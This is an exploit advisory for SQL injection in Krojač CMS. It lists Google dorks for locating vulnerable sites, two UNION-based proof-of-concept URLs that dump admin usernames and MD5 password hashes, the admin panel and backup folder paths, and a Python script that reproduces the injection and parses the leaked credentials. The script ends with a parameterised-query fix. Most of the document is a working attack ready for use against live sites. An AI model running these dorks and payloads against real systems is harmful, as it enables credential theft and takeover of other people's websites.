# Exploit Title: Krojac(h) CMS SQL Injection Vulnerabilities
# Date (found): June 2010
# Author: MikiSoft (Email: mihailosoft@gmail.com)
# CMS (Software) Site/Link: http://www.krojac.com
# Versions (affected): All (Edit: fixed in the latest version)
# Google dorks: intext:"Skrojio i sašio Krojač" ; intext:"Made by Krojač" ; inurl:"/krojacpanel/"
#   (the first two are the site footer credit; "Skrojio i sašio Krojač" is Serbian for "Tailored and sewn by Krojač")

## SQLi Vulnerabilities:

Affected files: myImage.class.php and myOpenFile.php
(Location of these files: /krojacpanel/php/class/myphp/)

SQLi details:
  Injection type: UNION-based, via the ID (myImage.class.php) and IDFajl (myOpenFile.php) GET parameters
  Number of columns: 1 (myImage.class.php) / 2 (myOpenFile.php), hence the extra ",2" in the second PoC
  Table: Korisnik
  Columns: username and password (stored as MD5 hashes)
  Panel (admin): /krojacpanel/ (log in with the cracked credentials)

PoC (Proof of Concept):
http://[SITE]/krojacpanel/php/class/myphp/myImage.class.php?ID=99999+union+all+select+group_concat(username,0x3a,password)+from+Korisnik--
http://[SITE]/krojacpanel/php/class/myphp/myOpenFile.php?IDFajl=99999+union+all+select+group_concat(username,0x3a,password),2+from+Korisnik--

Note: 0x3a is the MySQL hex literal for ':', so each leaked row reads username:md5hash; the high ID (99999) makes the original SELECT return nothing, leaving only the UNIONed rows in the response.

Btw. uploaded files/documents are usually (not always) found at /krojacpanel/UploadedFiles/ and /krojacpanel/documents/ ; the backup folder is /krojacpanel/Backup/

###END###

##P.S. If you have any questions, comments, or concerns, feel free to contact me.
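The injection the two PoC URLs exercise, reproduced against an in-memory SQLite database so it runs offline, as an added example (this is not Krojač CMS code and not the advisory author's). Table and column names `Slika(ID, path)` and `Fajl(IDFajl, name, size)` are invented so the two lookups have one and two result columns, matching the column counts above; the `Korisnik` rows are constructed sample data; and because SQLite's `group_concat` takes a single expression, the MySQL `group_concat(username,0x3a,password)` from the PoC is written as `group_concat(username||':'||password)`. Everything else in the payloads (the 99999 ID, `union all`, the `,2` padding column, the trailing `--` comment) is as in the PoC, and the parameterised lookup at the end shows the fix.

```python
"""Added example, not code from Krojač CMS or from the advisory.

Assumptions (not from the advisory): Slika/Fajl schemas, Korisnik sample
rows and passwords are all constructed here for illustration.
"""
import hashlib
import sqlite3
from urllib.parse import unquote_plus

# Query-string values from the PoC URLs; '+' decodes to a space.
# MySQL group_concat(username,0x3a,password) rewritten for SQLite.
PAYLOAD_ONE_COL = "99999+union+all+select+group_concat(username||':'||password)+from+Korisnik--"
PAYLOAD_TWO_COL = "99999+union+all+select+group_concat(username||':'||password),2+from+Korisnik--"


def md5hex(secret: str) -> str:
    """Plain MD5 hex digest, the password storage format the advisory reports."""
    return hashlib.md5(secret.encode()).hexdigest()


def build_db() -> sqlite3.Connection:
    """Constructed sample schema and data (hypothetical, not the CMS schema)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE Korisnik (username TEXT, password TEXT);
        CREATE TABLE Slika (ID INTEGER, path TEXT);
        CREATE TABLE Fajl (IDFajl INTEGER, name TEXT, size INTEGER);
        INSERT INTO Slika VALUES (1, 'UploadedFiles/logo.png');
        INSERT INTO Fajl VALUES (1, 'documents/cenovnik.pdf', 4096);
    """)
    for user, pw in (("admin", "letmein"), ("urednik", "krojac2010")):
        con.execute("INSERT INTO Korisnik VALUES (?, ?)", (user, md5hex(pw)))
    return con


def vulnerable_image_lookup(con, raw_id: str) -> list:
    """Flaw pattern behind myImage.class.php?ID=...: a one-column SELECT with
    the request value concatenated straight into the SQL."""
    return [row[0] for row in con.execute(f"SELECT path FROM Slika WHERE ID={raw_id}")]


def vulnerable_file_lookup(con, raw_id: str) -> list:
    """Flaw pattern behind myOpenFile.php?IDFajl=...: a two-column SELECT, so a
    UNION payload must supply two columns (hence ',2' in the second PoC)."""
    return list(con.execute(f"SELECT name, size FROM Fajl WHERE IDFajl={raw_id}"))


def safe_image_lookup(con, raw_id: str) -> list:
    """Hardened form: require an integer and bind it as a query parameter."""
    try:
        image_id = int(raw_id)
    except ValueError:
        return []
    return [row[0] for row in con.execute("SELECT path FROM Slika WHERE ID=?", (image_id,))]


def parse_leak(blob: str) -> dict:
    """Turn group_concat output 'user:hash,user:hash' into {user: hash}."""
    return dict(pair.split(":", 1) for pair in blob.split(","))


def run_poc() -> dict:
    con = build_db()
    one, two = unquote_plus(PAYLOAD_ONE_COL), unquote_plus(PAYLOAD_TWO_COL)
    return {
        # one row holding every username:hash pair, the original SELECT matched nothing
        "leaked_one_col": vulnerable_image_lookup(con, one),
        # same leak, padded to two columns so the UNION is accepted
        "leaked_two_col": vulnerable_file_lookup(con, two),
        # payload is not an integer, so the hardened lookup returns nothing
        "safe_lookup": safe_image_lookup(con, one),
        # a genuine ID still works through the parameterised query
        "safe_legit": safe_image_lookup(con, "1"),
    }


def wrong_column_count_fails() -> bool:
    """The one-column payload against the two-column query is rejected by the
    engine, which is why the advisory records the column count per file."""
    try:
        vulnerable_file_lookup(build_db(), unquote_plus(PAYLOAD_ONE_COL))
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    for name, value in run_poc().items():
        print(f"{name}: {value}")
    print("column-count mismatch rejected:", wrong_column_count_fails())
```

The `int()` cast plus bound parameter is the whole fix for an integer ID: there is no quoting to escape, and a payload that is not a number never reaches the database. The column-count check mirrors what an attacker does by hand when they add `,2` (or `,NULL`) until the UNION stops erroring.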